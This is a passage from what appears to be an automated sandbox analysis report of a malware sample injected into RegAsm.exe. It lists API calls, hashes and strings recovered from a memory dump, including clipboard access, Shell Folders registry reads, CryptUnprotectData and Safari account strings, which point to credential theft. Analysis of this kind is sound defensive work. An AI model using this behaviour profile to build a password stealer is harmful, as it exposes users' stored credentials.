                                                                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                              APIs
                                                                                                                                              • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFind
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3655998216-0
                                                                                                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@FilePointermemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 609303285-0
                                                                                                                                              • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                              • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2081463915-0
                                                                                                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                              • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                              • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                              • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                              • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                              • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                              • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                              APIs
                                                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3604893535-0
                                                                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                              APIs
                                                                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1213725291-0
                                                                                                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                              • free.MSVCRT ref: 00418370
                                                                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                              • String ID: OsError 0x%x (%u)
                                                                                                                                              • API String ID: 2360000266-2664311388
                                                                                                                                              • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                              • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                              • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2628231878-0
                                                                                                                                              • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                              • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                              • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                              • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                              APIs
                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Version
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1889659487-0
                                                                                                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                              APIs
                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                              APIs
                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                              • API String ID: 2257402768-1134094380
                                                                                                                                              • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
